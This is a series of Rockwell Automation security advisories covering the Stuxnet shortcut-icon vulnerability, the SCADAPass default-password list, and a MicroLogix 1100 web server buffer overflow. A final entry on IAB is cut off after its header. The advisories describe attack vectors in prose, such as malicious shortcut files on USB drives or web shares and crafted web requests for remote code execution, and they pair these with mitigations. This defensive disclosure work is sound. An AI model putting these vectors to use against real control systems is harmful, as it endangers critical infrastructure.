Rockwell Automation recommends that all industrial control system users, regardless of the make or brand of components employed within the system, take necessary steps to safeguard against potential future attacks of this type by implementing good cyber security measures as outlined below.

Background

A Windows™ operating system vulnerability known as the Shortcut Icon Loading Vulnerability (CVE-2010-2568) was confirmed as a means to allow malware commonly known as W32.Stuxnet to load and execute on PCs. The malware has also been confirmed to specifically target Siemens WinCC and PCS-7 SCADA software products. These products are typically used to control critical infrastructure processes that include power generation, power distribution, water/wastewater and other similar applications.

Rockwell Automation continues to closely monitor every aspect of this situation for new information and developments in order to provide our customers with timely and appropriate advice on this matter. Furthermore, we are continuing to work closely with appropriate authorities to review our proactive plans.

Given that industrial applications are known to heavily rely on mission-critical products built on the Windows operating system, Rockwell Automation is issuing guidance for all industrial control system customers. The following measures are intended as additions to a company’s own security policies and can help to reduce associated risk and enhance control system security.

Vulnerability Description

The Shortcut Icon Loading Vulnerability currently uses USB drives as a means of transport to infect a PC, and does not rely on user interaction or the optional AutoPlay feature employed by the Windows operating system for devices that connect to USB ports.

The Microsoft Security Bulletin MS10-046 v1.1, dated 2 August 2010 details the threat and risk as follows:

What causes the vulnerability?

When attempting to load the icon of a shortcut, the Windows Shell does not correctly validate specific parameters of the shortcut.

What might an attacker use the vulnerability to do?

An attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?

An attacker could present a removable drive to the user with a malicious shortcut file, and an associated malicious binary. When the user opens this drive in Windows Explorer, or any other application that parses the icon of the shortcut, the malicious binary will execute code of the attacker’s choice on the target system.

An attacker could also setup a malicious Web site or a remote network share and place the malicious components on this remote location. When the user browses the Web site using a Web browser such as Internet Explorer or a file manager such as Windows Explorer, Windows attempts to load the icon of the shortcut file, invoking the malicious binary. In addition, an attacker could embed an exploit in a document that supports embedded shortcuts or a hosted browser control (such as but not limited to Microsoft Office documents).

IMMEDIATE RECOMMENDATIONS

Rockwell Automation has compiled the following immediate recommendations that include advice from Microsoft, Department of Homeland Security (DHS)/ICS-CERT plus added specific Rockwell Automation recommendations that can help mitigate the threat and simultaneously enhance the security of control systems:

MICROSOFT recommends immediate application of a Windows software patch as referenced in Microsoft Security Advisory (2286198) and further detailed in Microsoft Security Bulletin MS10-046 v1.1, dated 2 August 2010.

NOTE: Rockwell Automation’s Patch Qualification team has completed an initial and partial qualification of the Microsoft Patch 2286198. See Rockwell Automation’s Immediate Recommendations below for additional information.

DHS/ICS-CERT recommends concerned users immediately implement the following measures:

Mitigations

  • Establish strict policies for the use of USB thumb drives on all enterprise and control system networks.
  • Caution users of this attack vector and remind them that unknown USB’s should never be plugged into a business or personal computer.

Specific to this Shortcut Icon Loading Vulnerability and the specific W32.Stuxnet virus, malware samples were provided to the antivirus vendor community. Most major antivirus suppliers have already released updated virus definitions to contain and remove the malware.

  • ICS-CERT recommends consulting antivirus vendors and to consider scanning systems with current antivirus software.

NOTE: Rockwell Automation software is proactively tested for compatibility with Symantec’s Norton Antivirus software.

DHS/ICS-CERT reminds users to exercise caution when using USB drives. For more information on best practices and removable media, see the ICS-CERT Control Systems Analysis Report "USB Drives Commonly Used As An Attack Vector Against Critical Infrastructure."

www.us-cert.gov/control_systems/pdf/ICS-CERT%20CSAR-USB%20USAGE.pdf

Additional DHS/US-CERT Security Tips for use of caution with USB drives can be found here:

www.us-cert.gov/cas/tips/ST08-001.html

ROCKWELL AUTOMATION recommends concerned customers take the following additional precautions to enhance protection to industrial control systems:

Mitigations

  1. Apply the Microsoft Windows software patch as referenced in Microsoft Security Advisory (2286198) and further detailed in Microsoft Security Bulletin MS10-046.

    NOTE: The Rockwell Automation Patch Qualification Team Partially Qualified KB2286198 on 9 August 2010, with Full Qualification on 19 August 2010.

    Go to RAid:35530 for more specific information regarding the qualification of this patch.
  2. Restrict control system access to only those authorized to work with these systems.
  3. Make sure that all control system PCs are running end-point protection software (e.g. Antivirus, Anti-malware) and that all signatures are up to date.
  4. Make sure that all control system PCs follow a regimented, timely patch management process. Before applying any patch, Rockwell Automation’s recommends customers confirm that the patch has been qualified by the Rockwell Automation Patch Qualification service (www.rockwellautomation.com/security).
  5. Where practical, disable all unused USB ports on control system PCs.
  6. Consider alternatives to USB drives (e.g. network file transfer) for transferring data files to the control system
  7. Discontinue use of any USB drive or similar device if the validity, authenticity, and security of the hardware should come in question.
  8. Purchase USB drives from trusted sources.
  9. Only use USB drives manufactured by a trusted vendor
  10. Format USB drives on a non-mission critical computer that is running up to date end-point protection software (e.g. Antivirus, Anti-malware) prior to connecting the USB drive to any critical industrial control system equipment.
  11. Maintain physical security for USB drives, dongles and keys to ensure only authorized users have access and usage rights.
  12. Should a failure in physical security policy regarding USB drives be identified, perform step 9 (format USB drive on non-mission critical computer) prior to subsequent connecting to any control system equipment. Seek instructions from supplier of USB dongles and keys prior to any further use on control system equipment.

NOTE: Similar caution with optical media should be employed as with USB drives. Software delivered on CD+/-R, DVD+/-R etc. non-production optical media (e.g. user-generated, "burned" not "pressed" media) is presumed higher risk than production-grade media.

As more information becomes known, Rockwell Automation expects these recommendations will be refined to help further protect control systems from the resulting risk.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security through the use of layered security and defense in depth practices when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at www.rockwellautomation.com/security.

KCS Status

Released

PN907 | PN907 | SCADAPass Default Passwords
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
2711P PanelView Plus 6 Logic Modules, POINT I/O Communication Interfaces, 2711P PanelView Plus 6 400-1500
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

SCADAPass Default Passwords

Description

Version 1.0 – January 11th 2016

In January 2016, SCADA Strange Love, an independent group of information security researchers, included several Rockwell Automation products in a project they published called SCADAPass.

SCADAPass contains a list of default passwords in popular industrial control systems ("ICS") and supervisory control and data acquisition ("SCADA") products, including programmable logic controllers ("PLCs") and human-machine interfaces ("HMIs"). Default credentials may be used by an attacker to gain privileged access to remotely accessible assets if a user does not take explicit action to change the default user credentials.

As part of this process, Rockwell Automation evaluated the included products in SCADAPass, and determined that all of the products’ default passwords are changeable by the user. Directions on how to change these passwords are found in the respective product manuals, which can be found in the table below.

INCLUDED PRODUCTS

  • 1756-EN2TSC
  • 1756-EWEB
  • 1734-AENT
  • MicroLogix 1400
  • MicroLogix 1100
  • PanelView Plus 6

RISK MITIGATIONS

  1. Rockwell Automation strongly recommends that asset owners evaluate the passwords used in their production assets, and apply the following suggested mitigations which are applicable:

    Product

    Product Manual
    1756-EN2TSC http://literature.rockwellautomation.com/idc/groups/literature/documents/um/enet-um003_-en-p.pdf
    1756-EWEB http://literature.rockwellautomation.com/idc/groups/literature/documents/um/enet-um527_-en-p.pdf
    1734-AENT http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1734-um011_-en-p.pdf
    MicroLogix 1100 http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1763-um002_-en-p.pdf
    MicroLogix 1400 http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1766-um002_-en-p.pdf
    PanelView Plus 6 http://www.manualsdir.com/manuals/580848/rockwell-automation-2711p-xxxx-panelview-plus-6-terminals-user-manual.html?page=54
  2. Establish and enforce password policies for maximum age of passwords, minimum password length, minimum password complexity, and password re-use.
  3. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  4. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  5. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  6. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  7. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  8. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

LINKS

KCS Status

Released

Critical
PN910 | PN910 | MicroLogix 1100 Web Server Buffer Overflow
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2016-0868
Products:
MicroLogix 1100 Web Server Buffer Overflow
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

MicroLogix 1100 Web Server Buffer Overflow

Description

Version 1.0 – January 26th 2016

In December 2015, Rockwell Automation was notified by ICS-CERT of a Buffer Overflow security vulnerability discovered in the web server of the Allen-Bradley MicroLogix 1100 controller platform. At this time, there is no known publicly available exploit code relating to the vulnerability. Rockwell Automation has verified this discovery and released revised product firmware to address associated risk. ICS-CERT published an advisory (ICSA-16-026-02) to cover this vulnerability.

Refer to the following for additional details relating to the vulnerability, affected product and recommended countermeasures.

AFFECTED PRODUCTS

  • 1763-L16AWA, 1763-L16BWA, 1763-L16BBB, 1763-L16DWD, Version 15.000 and earlier.

VULNERABILITY DETAILS

Remote Code Execution through Stack-based Buffer Overflow

A Remote Code Execution ("RCE") condition may result when an affected product receives a specific malicious web request. An attacker could exploit this vulnerability to inject and execute arbitrary code on the product. Receipt of such a request from an unintended or unauthorized source has the potential to cause loss of product availability and/or compromise the product’s integrity and confidentiality. The impact to the user’s automation system would be highly dependent on both the type of malicious code included in this attack and the mitigations that the user may already employ.

CVE-2016-0868 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

RISK MITIGATIONS

Rockwell Automation recommends that asset owners evaluate the impact with each of these vulnerabilities within their environment, and apply the following suggested mitigations which are applicable.

  1. Update supported products based on this table:
    Product Family Catalog Numbers Hardware Series Suggested Actions
    MicroLogix 1100 1763-L16AWA
    1763-L16BBB
    1763-L16BWA
    1763-L16DWD    		 Series B

    - Apply FRN 15.002
    (Downloads)

    - Apply the additional
    mitigations described below
    1763-L16AWA
    1763-L16BBB
    1763-L16BWA
    1763-L16DWD    		 Series A - Apply the additional
    mitigations described below
  2. Disable the web server on the MicroLogix 1100, as it is enabled by default. See KB 732398 for detailed instructions on disabling the web server for each controller platform.
  3. Set the keyswitch to RUN to prohibit re-enabling of the web server via RSLogix 500.
  4. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  7. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  8. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  9. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

LINKS

KCS Status

Released

Medium
PN915 | PN915 | Integrated Architecture Builder (IAB) Access Violation
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2016-2277
Products:
Integrated Architecture Builder (IAB)
CVSS Scores:
6.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down